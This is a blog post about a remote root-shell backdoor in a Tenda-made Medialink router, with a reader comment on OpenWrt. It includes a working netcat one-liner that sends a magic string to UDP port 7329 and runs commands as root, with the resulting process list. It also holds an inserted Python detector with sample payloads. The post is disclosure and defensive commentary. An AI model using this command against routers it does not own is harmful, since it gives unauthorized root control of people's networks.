Backdoor in my Medialink router

Just because you're paranoid doesn't mean they aren't out to getcha.

Here's another example of why we need free software running the Internet. When I bought my Medialink router it was the most popular brand of wireless router on Amazon.com. It is created by a Chinese corporation called Tenda.

And it comes with a root shell backdoor, which I just tested:

$ echo -ne "w302r_mfg\x00x/bin/ps" | nc -u -q 5 192.168.0.1 7329
  PID USER       VSZ STAT COMMAND
    1 0         1360 S    init
    2 0            0 SWN  [ksoftirqd/0]
    3 0            0 SW<  [events/0]
    4 0            0 SW<  [khelper]
    5 0            0 SW<  [kthread]
    6 0            0 SW<  [kblockd/0]
    7 0            0 SW<  [kswapd0]
    8 0            0 SW   [mtdblockd]
   16 0         2000 S    httpd
   18 0         1364 S    /bin/sh
   27 0            0 SW   [RtmpCmdQTask]
   28 0            0 SW   [RtmpWscTask]
   84 0         2328 S    wscd -m 1 -a 192.168.0.1 -i ra0
   85 0         2328 S    wscd -m 1 -a 192.168.0.1 -i ra0
  148 0         1200 S    netdog
  151 0         2000 S    httpd
  152 0         2000 S    httpd
  228 0         1360 S    udhcpc -i eth2.2 -s /etc/udhcpc.script -p /var/run/ud
  430 0         1316 S    dnrd -a 192.168.0.1 -R /etc/dnrd -s 10.0.0.138
  528 0         1076 S    /bin/sntp 7
  554 0         2352 S    upnpd -f eth2.2 br0
  555 0         2352 S    upnpd -f eth2.2 br0
  595 0         1368 S    udhcpd /etc/udhcpd.conf
  601 0         1160 S    netctl FilterDaemon
  614 0         1356 S    sh -c bin/ps
  615 0         1356 R    bin/ps

The backdoor was discovered by this hacker.

Don't get me wrong, it's not like I trusted this thing before. On the other hand, there are many ways that running your network on a device with a remote root shell bound to a UDP port can turn out badly. So I applied the firmware update provided by Tenda (ha, you caught us!). I'm hoping that in the new firmware they made the backdoor a little bit harder to find (e.g., by adding a port knocking scheme).
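A defensive check for the request shape used in the test above, as an added example (not from the original post, its author, or Tenda): it flags UDP datagrams sent to port 7329 that begin with the magic string and escapes the payload for logging. The record layout, the field names, the reading of the byte after the NUL as a selector, and the sample datagrams are assumptions constructed for illustration.

```python
from typing import List, NamedTuple, Optional, Tuple

BACKDOOR_PORT = 7329         # UDP port used in the test above
MAGIC = b"w302r_mfg\x00"     # magic string plus NUL, as sent in the test above

class Hit(NamedTuple):
    src: str
    dst: str
    selector: str   # byte after the NUL ('x' in the test above); its role is assumed
    argument: str   # rest of the payload as sent, escaped for logging

def printable(data: bytes) -> str:
    """Escape non-printable bytes and backslashes so a payload cannot forge log lines."""
    return "".join(chr(b) if 0x20 <= b < 0x7F and b != 0x5C else f"\\x{b:02x}"
                   for b in data)

def match_datagram(src: str, dst: str, dport: int, payload: bytes) -> Optional[Hit]:
    """Return a Hit when a UDP datagram has the shape of the request shown above."""
    if dport != BACKDOOR_PORT or not payload.startswith(MAGIC):
        return None
    rest = payload[len(MAGIC):]
    return Hit(src, dst, printable(rest[:1]), printable(rest[1:]))

def scan(datagrams: List[Tuple[str, str, int, bytes]]) -> List[Hit]:
    """Filter (src, dst, dst_port, payload) records down to backdoor requests."""
    hits = []
    for record in datagrams:
        hit = match_datagram(*record)
        if hit is not None:
            hits.append(hit)
    return hits

# Constructed sample records, e.g. as exported from a packet capture on the LAN.
SAMPLE = [
    ("192.168.0.50", "192.168.0.1", 7329, b"w302r_mfg\x00x/bin/ps"),
    ("192.168.0.50", "192.168.0.1", 53, b"w302r_mfg\x00x/bin/ps"),    # other port
    ("192.168.0.51", "192.168.0.1", 7329, b"hello"),                  # no magic
    ("192.168.0.52", "192.168.0.1", 7329, b"w302r_mfg\x00xecho a\nb"),
]

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f"ALERT {h.src} -> {h.dst}:{BACKDOOR_PORT} "
              f"selector={h.selector!r} argument={h.argument!r}")
```

Any hit on a home LAN deserves a look, since ordinary clients have no reason to send this string to the router.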

I also went shopping for a new router without a built-in backdoor but it turns out they are all backdoored! The current most popular brand of router on Amazon.com is TP-LINK, another Chinese brand. They didn't even bother to patch their backdoor.

FWIW, it's not just the Chinese routers but even the US-made ones. At this point I guess the best we can hope for from the manufacturers is that they put in more of an effort to hide their shenanigans. A root shell bound to a UDP port? Come on.

In the end I did end up buying a new router, a TP-Link WDR4300. Yes, the default firmware comes with a backdoor, but they're very popular and are supported by the OpenWRT - Open Wireless Router free software project.

Once again, free software saves the day.

Comments

Liraz Siri

Thanks for the reference. I hadn't heard of the open wireless project before. I'm reading up on it on the EFF website and it looks awesome. Which just goes to show how you don't know what you don't know.

It's a shame I won't be able to run the first versions of this on the new router I am expecting but I have a hunch if Open Wireless gets enough traction it will be available for the device I bought as well, if it isn't already compatible. Most of these routers use the same or very similar system-on-chip boards at the hardware level.

Or maybe alternatively the Open Wireless feature set gets merged back into OpenWrt, which it is distantly related to (Open Wireless is based on CeroWrt which is based on OpenWrt).
